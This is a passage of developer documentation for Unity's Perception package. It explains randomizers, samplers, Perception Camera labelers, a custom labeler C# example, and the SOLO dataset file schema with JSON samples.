   3. Relative or absolute translation (absolute sets the coordinate values directly)
2. Rotation
   1. Enabled or not
   2. Rotation range
   3. Relative or absolute rotation (absolute sets the rotation angles directly)
3. Scale
   1. Enabled or not
   2. Scale range
   3. Uniformly scaled? (whether all axes share the same randomized value)
   4. Relative or absolute scale (absolute sets the scale values directly)

Volume Randomizer: targets all objects with a Volume Randomizer Tag attached.

Volume Randomizer Tag: must be attached to a GameObject that has a Volume component.

From the list of available post-processing effects, choose which effects to randomize and the specific parameters of each:

1. Bloom – threshold, intensity, scatter

2. Exposure – compensation

3. Depth of Field – near focus start and end, far focus start and end

4. Camera Type – a list of camera specifications (focal length, sensor size, lens shift, gate fit, etc.)

5. Motion Blur – intensity, minimum velocity, maximum velocity

6. Lens Distortion – intensity, X and Y multipliers, center, scale

Randomizer Tags

RandomizerTags are the primary mechanism by which Randomizers query for a certain subset of GameObjects to randomize within a simulation. More specifically, RandomizerTags are components that can be added to GameObjects to register them with the active scenario's TagManager. The TagManager knows about every tagged object in the scene and can be queried to find all GameObjects that carry a particular tag. Below is a simple example: the ColorRandomizer uses a ColorRandomizerTag to query for all the GameObjects it will apply a random material base color to:

[Serializable]
[AddRandomizerMenu("Perception/Color Randomizer")]
public class ColorRandomizer : Randomizer
{
    static readonly int k_BaseColor = Shader.PropertyToID("_BaseColor");

    public ColorHsvaParameter colorParameter;

    protected override void OnIterationStart()
    {
        var taggedObjects = tagManager.Query<ColorRandomizerTag>();
        foreach (var taggedObject in taggedObjects)
        {
            var renderer = taggedObject.GetComponent<MeshRenderer>();
            renderer.material.SetColor(k_BaseColor, colorParameter.Sample());
        }
    }
}

RandomizerTags can also be used to customize how a Randomizer applies its randomizations to a particular GameObject.

Parameters

Parameters are usually defined as fields of a Randomizer class, but they can also be instantiated like any other C# class:

// Create a color Parameter
var colorParameter = new HsvaColorParameter();
// Generate one color sample
var color = colorParameter.Sample();

Note that Parameters, like Samplers, generate a new random value on every call to Sample():

var color1 = colorParameter.Sample();
var color2 = colorParameter.Sample();
Assert.AreNotEqual(color1, color2);

All parameters derive from the Parameter abstract class. In addition, the parameter types included in the Perception package derive from two specialized parameter base classes:

1. CategoricalParameter (categorical parameters)
2. NumericParameter (numeric parameters)

**Using Parameters outside of Randomizers (MonoBehaviours and ScriptableObjects):** after adding a public Parameter field to a MonoBehaviour or ScriptableObject, you may notice that the Parameter's UI looks different from when it is added to a Randomizer. This is because most of the Inspector UI for Perception randomization components is written with Unity's relatively new UI Elements framework, while by default Unity renders default inspector editors with the older IMGUI framework.

Suppose you have the following CustomMonoBehaviour with a public GameObjectParameter field:

using UnityEngine;
using UnityEngine.Perception.Randomization.Parameters;

public class CustomMonoBehaviour : MonoBehaviour
{
    public GameObjectParameter prefabs;
}

**Categorical Parameters:** categorical parameters pick a value from a list of options that have no intrinsic ordering. For example, a material parameter randomly picks from a list of material options, but the list itself can be rearranged into any order without affecting the distribution of the selected materials.

**Numeric Parameters:** numeric parameters use samplers to generate randomized structs. See the ColorHsvaParameter class included in the Perception package for an example of how to implement a numeric parameter.

Samplers

Samplers in the Perception package are classes that deterministically generate random float values from bounded probability distributions. Although Samplers are often used together with Parameters to generate arrays of typed random values, they can be instantiated and used from any ordinary script. A few samplers are included in the Perception package.

**Constant Sampler:** generates a constant value:

var sampler = new ConstantSampler();

// set sampled value to be 25
sampler.value = 25;

// Generate a sample
var sample = sampler.Sample(); // returns 25
var sample2 = sampler.Sample(); // returns 25
var sample3 = sampler.Sample(); // returns 25

**Uniform Sampler:** samples from a uniform distribution:

var sampler = new UniformSampler();

// generate values between the range 5 and 15
sampler.range = new FloatRange(5, 15);

// Generate a sample
var sample = sampler.Sample(); // value between 5 and 15

**Normal Sampler:** samples from a normal distribution; it generates random samples from a truncated normal distribution bounded by the specified range:

var sampler = new NormalSampler();

// the mean, often denoted by µ in statistics
sampler.mean = 10;
// the standard deviation, often denoted by σ in statistics
sampler.stdDev = 2;
// truncation: cut off values below -20 and above 20
sampler.range = new FloatRange(-20, 20);

// Generate a sample
var sample = sampler.Sample();
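To make the truncation concrete, here is a minimal Python sketch of rejection sampling from a truncated normal distribution, mirroring the behavior described above (an illustration only, not the package's actual algorithm):

import random

def truncated_normal(mean, std_dev, low, high):
    """Sample normal(mean, std_dev), rejecting values outside [low, high]."""
    while True:
        x = random.gauss(mean, std_dev)
        if low <= x <= high:
            return x

# Matches the C# example: mean 10, stdDev 2, range (-20, 20)
print(truncated_normal(10, 2, -20, 20))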


**Animation Curve Sampler:**

Animation Curves are a built-in Unity feature, not something specific to Perception.

Samples values according to the range and probability distribution denoted by a user-provided Animation Curve. The X axis of the curve corresponds to the values this sampler will pick from, and the Y axis corresponds to the relative probability of those values. The relative probability (Y axis) does not need to peak at 1, since only the shape of the curve matters; however, the Y values cannot be negative.

var sampler = new AnimationCurveSampler();

// create an animation curve programmatically
sampler.distributionCurve = AnimationCurve.EaseInOut(0, 1, 1, 100);

// Generate a sample
var sample = sampler.Sample();

It is easier to author an Animation Curve by exposing the sampler variable above in the Inspector and using Unity's UI to add and edit points on the curve.

// Unity UI handles curve creation
public AnimationCurve myDistributionCurve;

...

void myFunction() {
    var sampler = new AnimationCurveSampler();

    // public variable containing the AnimationCurve
    sampler.distributionCurve = myDistributionCurve;

    // Generate a sample
    var sample = sampler.Sample();
}

Samplers generate random values seeded by the active scenario's current random state. Changing the scenario's random seed causes Samplers to generate different values. Changing the order of Samplers, Parameters, or Randomizers also leads to different values being sampled during a simulation. Users are advised not to generate random values with the UnityEngine.Random or System.Random classes inside a simulation, since both can produce non-deterministic or improperly seeded values. Using only Perception samplers to generate random values helps ensure that Perception simulations produce consistent results during local execution and on Unity Simulation in the cloud.

Perception Camera

The Perception Camera component is attached to a Camera:

Properties

| Property | Function |
| --- | --- |
| Description | A description of the Camera to be registered in the JSON dataset. |
| Show Visualizations | Display realtime visualizations for labelers that are currently active on this camera. |
| Capture RGB Images | When you enable this property, Unity captures RGB images as PNG files in the dataset each frame. |
| Capture Trigger Mode | The method of triggering captures for this camera. In Scheduled mode, captures happen automatically based on a start frame and frame delta time. In Manual mode, captures should be triggered manually through calling the RequestCapture method of PerceptionCamera. |
| Override Layer Mask | When this property is enabled, labelers will utilize the layer mask on the Perception Camera instead of the culling mask on the camera when rendering objects during data capture. This override particularly affects object culling during segmentation image rendering. |
| Sensor Type | The Camera Sensor selected for producing pixel based ground truth data. |
| Layer Mask | The layer mask used by labelers when the Override Layer Mask field is enabled. |
| Alpha Threshold | The minimum level of transparency required for a pixel to be rendered in segmentation images. |
| Camera Labelers | A list of labelers that generate data derived from this Camera. |

Properties for Scheduled Capture Mode

| Property | Function |
| --- | --- |
| Simulation Delta Time | The simulation frame time (seconds) for this camera. E.g. 0.0166 translates to 60 frames per second. This will be used as Unity's Time.captureDeltaTime, causing a fixed number of frames to be generated for each second of elapsed simulation time regardless of the capabilities of the underlying hardware. For more information on sensor scheduling, see DatasetCapture. |
| First Capture Frame | Frame number at which this camera starts capturing. |
| Frames Between Captures | The number of frames to simulate and render between the camera's scheduled captures. Setting this to 0 makes the camera capture every frame. |

Properties for Manual Capture Mode

| Property | Function |
| --- | --- |
| Affect Simulation Timing | Have this camera affect simulation timings (similar to a scheduled camera) by requesting a specific frame delta time. Enabling this option will let you set the Simulation Delta Time property described above. |

Output Resolution

When generating a dataset from the Unity Editor, the resolution of the images produced by the Perception Camera matches the resolution set for the Editor's Game view. Images generated with built players (including local builds and Unity Simulation runs), however, use the resolution specified in the project settings. (This presumably refers to the compiled player.)

Unity Editor

Resolution and Presentation

Accumulation

Accumulation lets you use rendering techniques that need multiple frames to produce a final result, such as path tracing or accumulation motion blur.

Camera Sensors

Custom camera sensors can be implemented for Perception Cameras to control how rendering is performed for all supported channel types (RGB, instance segmentation, normals, depth, etc.). The specific sensor selected for a Perception Camera can be configured with the Sensor Type field in the Perception Camera component's inspector.

Unity Camera Sensor

The Unity camera sensor is the default sensor selected on Perception Cameras. This sensor type lets users capture the data output by the Camera component configured on the Perception Camera GameObject. The Super Sampling Factor field on this sensor tells the camera to capture images at 2x, 4x, or 8x the original width and height (4x, 16x, or 64x the resolution, respectively) to perform a high-quality super-sampling anti-aliasing (SSAA) effect. The effect uses sub-pixel averaging to produce a smoother output image with fewer aliasing artifacts around rendered geometry edges, and sometimes improved aliasing around small details in textures. Note that the sensor's output resolution does not change, regardless of the particular super-sampling setting configured on the sensor.

Camera Labelers

Camera labelers capture data related to the camera into the JSON dataset. You can use this data to train models and compute dataset statistics. The Perception package provides several CameraLabelers, and you can derive from the CameraLabeler class to define more.

Semantic Segmentation Labeler

The SemanticSegmentationLabeler generates a 2D RGB image with the attached Camera. Unity draws objects with the color associated with their label in the SemanticSegmentationLabelingConfiguration. If Unity cannot find a label for an object, it draws it in black.

Instance Segmentation Labeler

The **Instance Segmentation Labeler** generates a 2D RGB image with the attached camera. Unity draws each instance of a labeled object with a unique color.

Bounding Box 2D Labeler

The BoundingBox2DLabeler produces 2D bounding boxes for each visible object with a label defined in the IdLabelConfig. Unity computes the bounding boxes from the rendered image, so it excludes only the occluded or out-of-frame portions of an object.

Bounding Box 3D Labeler

The Bounding Box 3D Labeler produces 3D ground truth bounding boxes for each labeled GameObject in the scene. Unlike 2D bounding boxes, 3D bounding boxes are computed from the labeled meshes in the scene, and all objects are recorded regardless of their occlusion state.

***Note:*** the Bounding Box 3D Labeler only supports non-nested skinned mesh renderer objects.

Object Count Labeler

{
    "label_id": 25,
    "label_name": "drink_whippingcream_lucerne",
    "count": 1
}

The ObjectCountLabeler records object counts for each label you define in the IdLabelConfig. Unity only records objects that have at least one visible pixel in the camera frame.

Rendered Object Info Labeler

{
    "label_id": 24,
    "instance_id": 320,
    "visible_pixels": 28957
}

The RenderedObjectInfoLabeler records a list of all objects visible in the camera image, including their instance IDs, resolved label IDs, and visible pixel counts. If Unity cannot resolve an object to a label in the IdLabelConfig, the object is not recorded.

Keypoint Labeler

The **Keypoint Labeler** captures the screen locations of specific points on labeled GameObjects. Its typical use is capturing human pose estimation data, but it can capture points on any kind of object. The labeler uses a keypoint template, which defines the keypoints to capture for a model and the skeletal connections between those keypoints. Keypoint positions are recorded in pixel coordinates.

Occlusion Labeler

{
    "instanceId": 1,
    "percentVisible": 0.25,
    "percentInFrame": 0.5,
    "visibilityInFrame": 0.5
}

The **Occlusion Labeler** reports a set of visibility metrics for each object visible in the frame. Each set contains three metrics:

1. Percent Visible: the portion of the object that is visible.
2. Percent In Frame: the portion of the object that is not cut off by the camera frame.
3. Visibility In Frame: the unoccluded portion of the part of the object that is in frame.

These are related by $percentVisible = percentInFrame \times visibilityInFrame$.
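As a quick sanity check of this relation, using the values from the JSON example above:

percent_in_frame = 0.5
visibility_in_frame = 0.5

percent_visible = percent_in_frame * visibility_in_frame
assert percent_visible == 0.25  # matches "percentVisible" in the example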

Depth Labeler

"annotations": [
    {
        "@type": "type.unity.com/unity.solo.DepthAnnotation",
        "id": "Depth",
        "sensorId": "camera",
        "description": "Generates a 32-bit depth image in EXR format where each pixel contains the actual distance in Unity units (usually meters) from the camera to the object in the scene.",
        "imageFormat": "Exr",
        "dimension": [
            736.0,
            483.0
        ],
        "filename": "step0.camera.Depth.exr"
    }
]

Example annotation output for a depth frame

The **Depth Labeler** outputs 32-bit depth images in EXR format. Each pixel contains the actual distance from the camera to the object in the scene, in Unity units (usually meters). Depth values are written directly to the R channel.

Depth maps can be opened with RenderDoc.

Normal Labeler

"annotations": [
    {
        "@type": "type.unity.com/unity.solo.NormalAnnotation",
        "id": "Normal",
        "sensorId": "camera",
        "description": "Produces an image capturing the vertex normals of objects within the frame.",
        "imageFormat": "Exr",
        "dimension": [
            736.0,
            483.0
        ],
        "filename": "step0.camera.Normal.exr"
    }
]

The **Normal Labeler** captures the vertex normals of objects in the frame as a 3-channel image encoded in EXR format. The R, G, and B channels store the X, Y, and Z components of each pixel's vertex normal, respectively.

Environment Labeler

The **Environment Labeler** produces information about the scene's environment, such as the hierarchy of its labeled objects.

Available Information

Label Hierarchy – the label hierarchy (the hierarchy field in the JSON) provides the parent-child relationships between labeled objects, uniquely identified by instance ID. Users can decide whether to generate the label hierarchy only for visible objects or for all objects in the scene. Disabled objects are always ignored.

Annotation Example

{
    "@type": "type.unity.com/unity.solo.EnvironmentStateMetric",
    "id": "environment",
    "sensorId": "",
    "annotationId": "",
    "description": "Captures details about the environment such as label hierarchy",
    "hierarchy": [
        {
            "instance_id": 1,
            "parent_instance_id": null,
            "child_instance_ids": [ 3, 4]
        },
        {
            "instance_id": 5,
            "parent_instance_id": 2,
            "child_instance_ids": []
        },
        {
            "instance_id": 2,
            "parent_instance_id": null,
            "child_instance_ids": [5]
        }
    ]
}

Pixel Position Labeler

The Pixel Position Labeler outputs, per pixel, the camera-space distance from the camera to the object. The output is an image file in EXR format with the following encoding for each pixel. Consider a vector $v_{AB}=(x,y,z)$ from the camera to the object at pixel $(A,B)$:

Red channel – the $x$ component of $v_{AB}$

Green channel – the $y$ component of $v_{AB}$

Blue channel – the $z$ component of $v_{AB}$

Alpha channel – always set to 1

Metadata Labeler

At the end of each frame, this labeler collects data from all MetadataTags in the scene and records it in the metadata section of the resulting JSON.

Included metadata tags
• LabelingNameMetadataTag
  • Adds information about the GameObject's name
  • A simple example of adding data to the frame JSON
• LabelingTagMetadataTag
  • Adds information about the GameObject's tag
  • A simple example of adding data to the frame JSON
• LightMetadataTag
  • Adds information about a light's intensity and color
  • An example of injecting scene-related information into the frame JSON
• LabelingChildNameMetadataTag
  • Reports the names of child objects into the parent's data
  • An example of grouping data from different objects into the same report
• LabelingDistanceToMainCameraMetadataTag
  • Reports the distance from the GameObject to the main camera
  • A simple example of reporting an arbitrary Unity Engine computation
• LabelingKeyValuesMetadataTag
  • Adds the ability to attach custom strings through the Unity Editor
  • An example of adding custom information via the Unity Editor
• LabelingTransformDataMetadataTag
  • Adds information about the GameObject's transform
  • An example of choosing in the Unity Editor which information to include in the frame JSON

To implement a custom metadata tag:

1. Derive from LabelMetadataTag

2. Implement the required abstract methods:

   2.1 key – the name of the object in the serialized JSON file

   2.2 GetReportedValues(IMessageBuilder builder) – add any information needed here through the builder, e.g. builder.Add("object_name", <data to be added>)

3. Add the component to a GameObject that carries a Labeling component

Limitations

Ground truth is not compatible with all rendering features, especially those that modify the visibility or shape of objects in the frame.

When generating ground truth:

• Unity does not run vertex and geometry shaders
• Unity does not run post-processing effects, except the built-in lens distortion in HDRP

Dataset Capture

DatasetCapture tracks sensors, annotations, and metrics, and passes the data to the active endpoint. It also controls the simulation time elapsed per frame to accommodate the active sensors.


The code below is a custom camera labeler (CameraLabeler) that adds labels and metrics to the scene for training and evaluating models.

In a Perception Camera, a Label is usually used to mark objects in the scene (people, cars, buildings, etc.) and their attributes (category, size, color, and so on). This information can be added or modified by a labeler and used to train and evaluate machine learning models.

A Metric measures a physical quantity in the scene or an indicator of the training and evaluation process, such as a light's position, an object's velocity, or a model's accuracy. These values can be recorded for deeper data analysis and mining later. Compared with Labels, Metrics focus more on numeric precision and repeatability, helping developers analyze and improve an algorithm's performance.

In short, a Label annotates an object in the scene, while a Metric measures a physical quantity or model performance. They serve different purposes, but both are key sources of information for machine learning and computer vision tasks.

using System;
using UnityEngine;
using UnityEngine.Perception.GroundTruth;
using UnityEngine.Perception.GroundTruth.DataModel;
using UnityEngine.Rendering;

// CustomLabeler derives from CameraLabeler
public class CustomLabeler : CameraLabeler
{
    // Override the description, labelerId, and supportsVisualization properties
    public override string description => "Demo labeler";
    public override string labelerId => "Demo labeler";
    protected override bool supportsVisualization => false;

    // Public GameObject fields for the light and the target object to report on
    public GameObject targetLight;
    public GameObject target;

    // lightMetricDefinition describes the light metric;
    // targetPositionDef describes the target-position annotation
    MetricDefinition lightMetricDefinition;
    AnnotationDefinition targetPositionDef;

    // An AnnotationDefinition subclass representing the target's position in camera space
    class TargetPositionDef : AnnotationDefinition
    {
        // Constructor: takes a string ID used to initialize the annotation definition
        public TargetPositionDef(string id)
            : base(id) { }

        // modelType: a read-only string identifying the type of this annotation definition
        public override string modelType => "targetPosDef";
        // description: a read-only string describing the purpose of this annotation definition
        public override string description => "The position of the target in the camera's local space";
    }

    // A serializable Annotation holding the target's position in camera space
    [Serializable]
    class TargetPosition : Annotation
    {
        // Constructor: takes the annotation definition, the sensor ID,
        // and the target's position in camera space, and initializes the base class
        public TargetPosition(AnnotationDefinition definition, string sensorId, Vector3 pos)
            : base(definition, sensorId)
        {
            position = pos;
        }

        // The target's position in camera space
        public Vector3 position;

        // ToMessage(): converts this annotation into message form for transport and analysis
        public override void ToMessage(IMessageBuilder builder)
        {
            base.ToMessage(builder);
            // AddFloatArray() serializes the position as a float array into the message body
            builder.AddFloatArray("position", MessageBuilderUtils.ToFloatVector(position));
        }

        // Whether this annotation instance is valid; always true here
        public override bool IsValid() => true;
    }

    // Setup() registers the light metric and the target-position annotation definition
    protected override void Setup()
    {
        // Create a MetricDefinition describing the light's world-space position.
        // The constructor takes three strings: the unique ID, the name, and the description.
        lightMetricDefinition =
            new MetricDefinition(
                "LightMetric",
                "lightMetric1",
                "The world-space position of the light");
        // Register the metric definition with DatasetCapture
        DatasetCapture.RegisterMetric(lightMetricDefinition);

        // Create a TargetPositionDef describing the target's position relative to the camera
        targetPositionDef = new TargetPositionDef("target1");
        // Register the annotation definition with DatasetCapture
        DatasetCapture.RegisterAnnotationDefinition(targetPositionDef);
    }

    // OnBeginRendering() runs before the scene is rendered: it reports the
    // light-position metric and the target-position annotation
    protected override void OnBeginRendering(ScriptableRenderContext scriptableRenderContext)
    {
        // Report the light's world-space position as a GenericMetric
        var lightPos = targetLight.transform.position;
        var metric = new GenericMetric(new[] { lightPos.x, lightPos.y, lightPos.z }, lightMetricDefinition);
        DatasetCapture.ReportMetric(lightMetricDefinition, metric);

        // Compute the location of the object in the camera's local space
        Vector3 targetPos = perceptionCamera.transform.worldToLocalMatrix * target.transform.position;

        // Report the annotation using the PerceptionCamera's SensorHandle if scheduled this frame
        var sensorHandle = perceptionCamera.SensorHandle;

        if (sensorHandle.ShouldCaptureThisFrame)
        {
            var annotation = new TargetPosition(targetPositionDef, sensorHandle.Id, targetPos);
            sensorHandle.ReportAnnotation(targetPositionDef, annotation);
        }
    }
}

    Example metric that is added each frame in the dataset:

{
    "capture_id": null,
    "annotation_id": null,
    "sequence_id": "9768671e-acea-4c9e-a670-0f2dba5afe12",
    "step": 1,
    "metric_definition": "lightMetric1",
    "values": [
        96.1856,
        192.675964,
        -193.838638
    ]
},

**Example annotation that is added to each capture in the dataset:**

{
    "annotation_id": "target1",
    "model_type": "targetPosDef",
    "description": "The position of the target in the camera's local space",
    "sensor_id": "camera",
    "id": "target1",
    "position": [
        1.85350215,
        -0.253945172,
        -5.015307
    ]
}

Output Endpoint

Dataset Capture tracks sensors, annotations, and metrics and passes the data to an Endpoint. The Endpoint is responsible for packaging the data into a format usable by the user.

Supported Endpoints

The Perception package includes three built-in endpoint options:

1. (Recommended) SOLO Endpoint

Our newest output format writes capture information to the relevant directories as the simulation progresses. This differs from our previous approach of writing the data at the end of the simulation, and lets you inspect data while a long simulation is still running. See the full list of advantages the SOLO endpoint has over the previous Perception endpoint.

A SOLO dataset is a combination of JSON and image files. This section describes the schema used to store the data.

The SOLO schema provides a common structure for simulation output that can easily be used to display statistics or train machine learning models.

A SOLO dataset consists of sensor captures, annotations, and metrics, e.g. images and 2D bounding box labels.

This data comes in various forms and may be captured by different sensors and annotation mechanisms.

Multiple sensors may produce captures at different frequencies.

Goals

The schema should:

• Include captured sensor data and annotations in a well-defined format. This allows us to maintain a contract between the Perception package and dataset consumers (e.g. statistics and ML modeling...)

• Maintain the relationship between captured data and annotations taken by the same sensor at the same time. It should also maintain the relationship between consecutive captures for time-related perception tasks (e.g. object tracking).

• Support streaming data, since the data is created on the fly from multiple processes or cloud instances during the simulation.

• Make it easy to support new types of sensors and annotations.

Terminology
• simulation: one or more builds of a Unity player, possibly with different parameters.
• capture: a full rendering pass of a Unity sensor, saving the rendered result to a data file (e.g. png, pcd, etc.)
• frame: an actual frame in the Unity simulation
• sequence: a time-ordered series of captures produced by a simulation. (Each Iteration of a Perception Scenario corresponds to one SOLO data sequence)
• step: the data index of the frames produced within each sequence.
• annotation: recorded data (such as bounding boxes or semantic segmentation) describing a particular capture at the same timestamp. A capture may include multiple types of annotations.
• label: a string token (e.g. car, human.adult, etc.) that represents a semantic type or class. One GameObject may have multiple labels for different annotation purposes.
• coordinate systems: the schema uses 3 coordinate systems:
  • global coordinate system: coordinates relative to the global origin in Unity.
  • ego coordinate system: coordinates relative to the ego (the body carrying the sensors).
  • sensor coordinate system: coordinates relative to the sensor. This is useful for ML model training on a single sensor, and can be transformed from the global and ego coordinate systems. Raw values of object poses in the sensor coordinate system are rarely recorded in simulation.
Structure

SOLO data is stored in a sequence/step hierarchy. The top level of the generated data contains the metadata definition files, plus one directory per captured sequence.

Inside a sequence directory there is a JSON file containing all annotations and metrics for each frame.

Sensor and annotator outputs (such as RGB captures or segmentation masks) also reside in this directory. For organizational purposes, all files follow a strict naming pattern; frame files look like this:

• step.NNNN.frame.json
  • NNNN is the step number
• step.NNNN.ID.EXT
  • NNNN is the step number
  • ID is the registered ID of the sensor or labeler that created the file
  • EXT is the file extension

The top-level directory contains:

• metadata.json: the metadata file contains simulation-wide data. These values are either generated automatically once by the Perception package or are system-wide metadata.

{
    "unityVersion": "2021.3.11f1",
    "perceptionVersion": "1.0.0-preview.1",
    "renderPipeline": "HDRP",
    "simulationStartTime": "2023/6/21 8:17:17",
    "scenarioRandomSeed": 539662031,
    "scenarioActiveRandomizers": [
        "BackgroundObjectPlacementRandomizer",
        "TextureRandomizer",
        "HueOffsetRandomizer",
        "ForegroundObjectPlacementRandomizer",
        "RotationRandomizer"
    ],
    "totalFrames": 100,
    "totalSequences": 100,
    "sensors": [
        "camera"
    ],
    "metricCollectors": [
        "ObjectCount",
        "RenderedObjectInfo",
        "scenario_iteration",
        "random-seed"
    ],
    "simulationEndTime": "2023/6/21 8:17:21",
    "annotators": [
        {
            "name": "bounding box",
            "type": "type.unity.com/unity.solo.BoundingBox2DAnnotation"
        },
        {
            "name": "semantic segmentation",
            "type": "type.unity.com/unity.solo.SemanticSegmentationAnnotation"
        }
    ]
}
• sensor_definitions.json: contains the definitions of all sensors in the dataset.

{
    "sensorDefinitions": [
        {
            "@type": "type.unity.com/unity.solo.RGBCamera",
            "id": "camera",
            "modality": "camera",
            "description": "",
            "firstCaptureFrame": 0.0,
            "captureTriggerMode": "Scheduled",
            "simulationDeltaTime": 0.0166,
            "framesBetweenCaptures": 0,
            "manualSensorsAffectTiming": false
        }
    ]
}
• annotation_definitions.json: contains the definitions of all annotations in the dataset.

{
    "annotationDefinitions": [
        {
            "@type": "type.unity.com/unity.solo.BoundingBox2DAnnotation",
            "id": "bounding box",
            "description": "Produces 2D bounding box annotations for all visible objects that bear a label defined in this labeler's associated label configuration.",
            "spec": [
                {
                    "label_id": 1,
                    "label_name": "candy_minipralines_lindt"
                },

                ...

                {
                    "label_id": 10,
                    "label_name": "snack_granolabar_naturevalley"
                }
            ]
        },
        {
            "@type": "type.unity.com/unity.solo.SemanticSegmentationAnnotation",
            "id": "semantic segmentation",
            "description": "Generates a semantic segmentation image for each captured frame. Each object is rendered to the semantic segmentation image using the color associated with it based on this labeler's associated semantic segmentation label configuration. Semantic segmentation images are saved to the dataset in PNG format. Please note that only one SemanticSegmentationLabeler can render at once across all cameras."
        }
    ]
}
• metric_definitions.json: contains the definitions of all metrics in the dataset.

{
    "metricDefinitions": [
        {
            "@type": "type.unity.com/unity.solo.ObjectCountMetric",
            "id": "ObjectCount",
            "description": "Produces object counts for each label defined in this labeler's associated label configuration."
        },
        {
            "@type": "type.unity.com/unity.solo.RenderedObjectInfoMetric",
            "id": "RenderedObjectInfo",
            "description": "Produces label id, instance id, and visible pixel count in a single metric each frame for each object which takes up one or more pixels in the camera's frame, based on this labeler's associated label configuration."
        },
        {
            "@type": "type.unity.com/unity.solo.GenericMetric",
            "id": "scenario_iteration",
            "description": "Iteration information for dataset sequences"
        },
        {
            "@type": "type.unity.com/unity.solo.GenericMetric",
            "id": "random-seed",
            "description": "The random seed used to initialize the random state of the simulation. Only triggered once per simulation."
        }
    ]
}

Each sequence gets its own directory, which contains all of its captures. The naming convention for sequence directories is sequence.X, where X is a number starting at 0. For example, the first three sequence directories of a simulation are named:

• sequence.0
• sequence.1
• sequence.2

A sequence directory contains all captures, annotations, and metrics for the sequence.

All data file names start with the step at which they were captured. The naming rules differ by file type:

File Structure

dataset.XXXX
├── metadata.json
├── sensor_definitions.json
├── annotation_definitions.json
├── metric_definitions.json
└── sequence.NUM
    ├── step.NUM.frame.json
    ├── step.NUM.capture.SENSOR[_ID].[ext]
    └── step.NUM.annotation.NAME[_ID].SENSOR[_ID].[ext]

Example Dataset Layout

dataset
├── metadata.json
├── sensor_definitions.json
├── annotation_definitions.json
├── metric_definitions.json
├── sequence.1
│   ├── step.1.frame.json
│   ├── step.1.rgb.front_camera.png
│   ├── step.1.semantic_segmentation_0.png
│   ├── step.1.semantic_segmentation_1.png
│   ├── step.1.instance_segmentation.png
│   ├── step.2.frame.json
│   ├── step.2.rgb.front_camera.png
│   ├── step.2.semantic_segmentation_0.png
│   ├── step.2.semantic_segmentation_1.png
│   └── step.2.instance_segmentation.png
└── sequence.2
    ├── step.1.frame.json
    ├── step.1.rgb.front_camera.png
    ├── step.1.semantic_segmentation_0.png
    ├── step.1.semantic_segmentation_1.png
    ├── step.1.instance_segmentation.png
    ├── step.2.frame.json
    ├── step.2.rgb.front_camera.png
    ├── step.2.semantic_segmentation_0.png
    ├── step.2.semantic_segmentation_1.png
    └── step.2.instance_segmentation.png
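To show how this layout is consumed, here is a minimal Python sketch that walks a SOLO dataset and counts frames and captures per sequence, relying only on the naming rules above (the dataset path is a placeholder):

import json
from pathlib import Path

dataset_root = Path('dataset')  # placeholder path

for sequence_dir in sorted(dataset_root.glob('sequence.*')):
    frame_files = sorted(sequence_dir.glob('step.*.frame.json'))
    print(f'{sequence_dir.name}: {len(frame_files)} frames')
    for frame_file in frame_files:
        with open(frame_file) as f:
            frame = json.load(f)
        # Per the frame schema below, each frame records its step and captures
        captures = frame.get('captures', [])
        print(f"  step {frame.get('step')}: {len(captures)} capture(s)")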
Frame

For step.1.frame.json, the file structure and its explanation:

frame {
    frame: <int> -- The integer ID of the frame
    sequence: <int> -- The sequence number
    step: <int> -- The step inside the sequence
    timestamp: <int> -- Timestamp in milliseconds since the sequence started
    captures: [<capture>,...] [optional] -- The list of captures (see below)
    metrics: [<metric>,...] [optional] -- The list of metrics recorded for the frame (see below)
}
Capture

A Capture record contains the relationship between a captured file, a collection of annotations, and extra metadata that describes the state of the sensor.

capture {
    @type: <str> -- The class type of the sensor
    id: <str> -- The ID of the sensor that made the capture
    description: <str> -- Human readable description of the sensor
    position: <float3> -- Position in meters: (x, y, z) with respect to the global coordinate system
    rotation: <float4> -- Orientation as quaternion: w, x, y, z
    velocity: <float3> -- Velocity in meters per second as v_x, v_y, v_z
    acceleration: <float3> [optional] -- Acceleration in meters per second^2 as a_x, a_y, a_z
    annotations: [<obj>,...] [optional] -- List of the annotations in this capture. See below.
}
RGB Capture

rgb_capture : capture {
    filename: <str> -- A single file that stores sensor captured data.
    imageFormat: <str> -- The format of the sensor captured file. (e.g. "Png")
    dimension: <int2> -- The image size in pixels (width/height)
    projection: <string> -- holds the type of projection the camera used for that capture. Options: "perspective" or "orthographic"
    matrix: <float3> -- The projection matrix of the camera
}

reference: [camera_intrinsic](https://www.mathworks.com/help/vision/ug/camera-calibration.html#bu0ni74)
Sequence, Step, and Timestamp

In some use cases, two consecutive captures are not related in time during the simulation, e.g. when we generate randomly placed objects in the scene for X steps of simulation. In these cases, sequence, step, and timestamp are irrelevant to the captured data, and we can use a default value for them. In cases where we need to maintain the temporal order between captures (e.g. a sequence of camera captures in a 10-second video) and metrics, we need sequence, step, and timestamp to maintain that order.

In SOLO, a sequence represents any collection of time-ordered captures and annotations and corresponds to one iteration of a Perception scenario. The timestamp is the simulation wall clock, in milliseconds, since the start of the sequence. The step is an integer value that is incremented whenever a capture or metric event is triggered. We cannot use timestamps to synchronize two different events, because timestamps are floats and therefore make poor indices; instead, we use a step counter, which makes it easy to correlate metrics and captures that occur at the same time.

Since each sensor may trigger captures at a different frequency, at the same timestamp we may include anywhere from 0 to N captures, where N is the total number of sensors included in the scenario. If two sensors capture at the same timestamp, they should share the same sequence, step, and timestamp values.

Annotation

An annotation record contains the ground truth for a sensor, either inline or in a separate file. A single capture may contain many annotations, each corresponding to one active Labeler in the simulation.

annotation {
    @type: <str> -- The class type of the annotation
    id: <str> -- The registered ID of the annotation
    sensorId: <str> -- The ID of the sensor that this annotation is attached to
    description: <str> -- The human readable description of the sensor
}

In addition to the above, an annotation may include an array of the individual objects recorded for that annotation, such as a list of bounding boxes. We will see a few examples below. This array is usually named values or instances.

Example Annotations

Semantic Segmentation

The semantic segmentation annotation extends the base annotation class to include the filename of a color mask in PNG format, in which each color maps to a unique object class.

SemanticSegmentationAnnotation {
    @type: "type.unity.com/unity.solo.SemanticSegmentationAnnotation",
    id: <str> -- The registered ID of the annotation
    sensorId: <str> -- The ID of the sensor that this annotation is attached to
    description: <str> -- The human readable description of the sensor
    imageFormat: <str> -- Format of the segmentation mask ("Png")
    dimension: <int2> -- Width and height of the output image
    instances [ -- Array of recorded object classes and their unique R,G,B pixel values
        {
            labelName: <str> -- String identifier of the object class label
            pixelValue: <int4> -- R,G,B,A values for this label's unique color [0-255]
        }, ...
    ]
}

An example semantic segmentation annotation:

{
